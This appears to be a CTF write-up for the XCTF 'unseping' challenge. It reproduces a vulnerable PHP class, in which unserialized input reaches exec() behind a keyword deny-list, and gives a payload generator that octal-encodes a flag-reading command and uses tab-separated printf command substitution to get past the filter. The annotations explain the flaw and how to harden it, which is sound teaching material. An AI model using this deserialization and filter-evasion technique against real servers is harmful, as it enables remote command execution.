xctf unseping

 PHP 的 payload 生成脚本如下。注意 `$(printf` 后面接的是 Tab 而不是空格,因为空格会被 waf() 拦截;命令本身用八进制转义编码,所以黑名单里的关键字也匹配不到。

 <?php
// Outputs this file's own source with syntax highlighting, so the code below
// is visible to anyone who requests the page.
highlight_file(__FILE__);

/**
 * Challenge class reproduced from the XCTF "unseping" task.
 *
 * Lifecycle as visible in this listing:
 *  - __wakeup() (invoked by PHP when an instance is unserialized) passes every
 *    element of $args through waf().
 *  - __destruct() (invoked when the instance is destroyed) calls the method
 *    named by $method with $args, but only if in_array() finds that name in
 *    the one-entry list ["ping"].
 *  - ping() passes its argument to exec().
 *
 * Security note: both properties are restored from the serialized string, so
 * whoever supplies that string decides what reaches exec(); waf() is the only
 * check in between. NOTE(review): the unserialize() call site is not part of
 * this listing; presumably the target decodes and unserializes a request
 * parameter. Confirm against the original task source.
 *
 * Hardening, if this were production code: do not unserialize untrusted data
 * (use json_decode(), or unserialize() with ['allowed_classes' => false]),
 * validate the argument against an allow-list such as
 * filter_var($ip, FILTER_VALIDATE_IP), and quote it with escapeshellarg()
 * before it gets near a shell.
 */
class ease{
    
    // Name of the method __destruct() will dispatch to.
    private $method;
    // Argument list handed to that method; __wakeup() iterates it with foreach.
    private $args;
    /**
     * Stores the method name and the argument list without any validation.
     *
     * @param mixed $method  method name later checked in __destruct()
     * @param mixed $args    arguments later passed to that method
     */
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    /**
     * Dispatches to the method named by $this->method when it is on the list.
     *
     * PHP runs this on object destruction, which includes objects created by
     * unserialize(); no explicit call is needed.
     */
    function __destruct(){
        // in_array() is called without its third (strict) argument, so the
        // comparison against "ping" is loose (==).
        if (in_array($this->method, array("ping"))) {
            // Equivalent to $this->{method}(...$this->args).
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    /**
     * Runs $ip as a shell command line and dumps the captured output.
     *
     * Despite the parameter name, nothing here checks that $ip is an IP
     * address or quotes it; the whole string is handed to exec().
     *
     * @param mixed $ip  command string passed to exec()
     */
    function ping($ip){
        // exec() stores the command's output lines in $result.
        exec($ip, $result);
        var_dump($result);
    }
 
    /**
     * Deny-list filter: rejects strings containing |, &, ;, a space character,
     * /, or one of the substrings cat, flag, tac, php, ls.
     *
     * The pattern is matched against the raw string only. Anything the shell
     * interprets later (tab as a separator, command substitution, escape
     * sequences expanded by another program) is not on the list, which is why
     * a deny-list is a weak control in front of exec().
     *
     * @param mixed $str  value to inspect
     * @return mixed      $str unchanged when nothing matches; otherwise the
     *                    function prints "don't hack" and falls off the end,
     *                    which yields null
     */
    function waf($str){
        // preg_match_all() returns the number of matches; 0 means no
        // deny-listed token was found.
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            // No return and no exit here: execution continues in the caller,
            // which receives null.
            echo "don't hack";
        }
    }
 
    /**
     * Filters every element of $args through waf() right after unserialize().
     *
     * A rejected element is replaced by null (waf()'s implicit return value);
     * the object itself stays alive and __destruct() still runs afterwards.
     * NOTE(review): assumes $args is an array of strings. foreach and
     * preg_match_all() are not guarded against other types.
     */
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}
// Payload generator from the write-up: builds an `ease` object and prints its
// serialized form.
// NOTE: when this script ends, $ctf is destroyed and __destruct() dispatches
// to ping(), so the command is also executed on the machine running this
// script. Run it only in a disposable environment.

// The command ping() should end up executing. In clear text waf() would reject
// it: it contains "cat", "flag", "php", a space and "/".
$b = "cat flag_1s_here/flag_831b69012c67b35f.php";
$c = "";
// Re-encode every byte of $b as a backslash followed by its octal value.
for($i=0;$i<strlen($b);$i++){
	// ord() gives the byte value, decoct() its octal digits as a string.
	$temp_str = decoct(ord(substr($b,$i,1)));
	$c = $c."\\".$temp_str;
}
// Prints the encoded form for inspection.
echo $c;
// Wraps the encoded string in shell command substitution around printf. The
// separator after "printf" is a literal TAB character, because waf() rejects
// the space character.
$c = '$(printf	"'.$c.'")';
// $args has to be an array: __wakeup() iterates it with foreach and
// __destruct() passes it to call_user_func_array().
$a = array($c);
$ctf = new ease("ping",$a);
// serialize() does not invoke __wakeup(), so waf() is not applied here; it
// runs only when the string is unserialized. Private properties are serialized
// with NUL bytes around the class name, and base64 keeps those bytes intact.
echo base64_encode(serialize($ctf));
?>

posted on 2022-12-16 16:23  小丑首长
